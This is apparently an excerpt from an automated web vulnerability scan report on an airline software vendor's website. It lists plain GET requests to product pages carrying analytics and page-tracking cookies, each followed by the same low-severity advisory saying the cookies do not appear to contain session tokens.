GET /home/products_services/sabre_qik_analysis_system HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_qik_analysis_system/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322603; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fproducts_services%2Fcredit_suite%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fproducts_services%2Ffrequent_flyer_management%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_revenue_manager%2F%22%3Bi%3A3%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_airvision_schedule_manager%2F%22%3Bi%3A4%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_revenue_integrity HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_revenue_integrity/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323033; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_brand%2F%22%3Bi%3A2%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A3%3Bs%3A52%3A%22%2Fproducts_services%2Fproduct%2Fgds_electronic_ticketing%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_schedule_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabresonic_check-in HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_check-in/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322592; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabresonic_css HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_inventory/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322592; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_group_ecommerce%2F%22%3Bi%3A1%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabresonic_inventory HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_inventory/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322592; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A37%3A%22%2Fproducts_services%2Fagency_management%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabresonic_sell HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_sell/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322591; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A54%3A%22%2Fproducts_services%2Fsabre_airvision_revenue_accounting%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabresonic_web HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_web/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322583; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/services/airline_community HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322629; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3Bi%3A4%3Bs%3A50%3A%22%2Fproducts_services%2Fautomated_exchange_and_refunds%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/services/airline_community/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322217; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/services/consulting_services HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322619; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/services/delivery_and_customer_care HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/services/delivery_and_customer_care/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322619; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Finteract_interface%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/technical_records_hub HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/technical_records_hub/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322616; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_planner%2F%22%3Bi%3A2%3Bs%3A37%3A%22%2Fproducts_services%2Fsabre_emd_manager%2F%22%3Bi%3A3%3Bs%3A39%3A%22%2Fproducts_services%2Fsabresonic_check-in%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_slot_manager_iata%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/technology HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322224; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A3%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_qik_analysis_system%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/technology/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322231; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A2%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/technology/sabre_asx_airline_services_exchange HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/technology/sabre_asx_airline_services_exchange/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322632; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_planner%2F%22%3Bi%3A4%3Bs%3A37%3A%22%2Fproducts_services%2Fsabre_emd_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/technology/sabre_asx_airline_services_exchange/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322240; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A1%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A2%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/technology/software_as_a_service HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/technology/software_as_a_service/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322910; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A51%3A%22%2Fproducts_services%2Fproduct%2Fsabre_revenue_integrity%2F%22%3Bi%3A1%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_qik_analysis_system%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_in-flight%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/technology/software_as_a_service/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322234; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A2%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/travel_bank HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/travel_bank/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322592; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_airvision_group_manager%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/web_services HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/web_services/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322604; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A72%3A%22%2Fproducts_services%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts_services%2Fsabresonic_css%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_group_ecommerce%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/search/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321226; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/search/show_results HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321194; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3Bi%3A1%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /images/prettyPhoto/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321211; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A1%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /images/prettyPhoto/dark_rounded/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321228; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
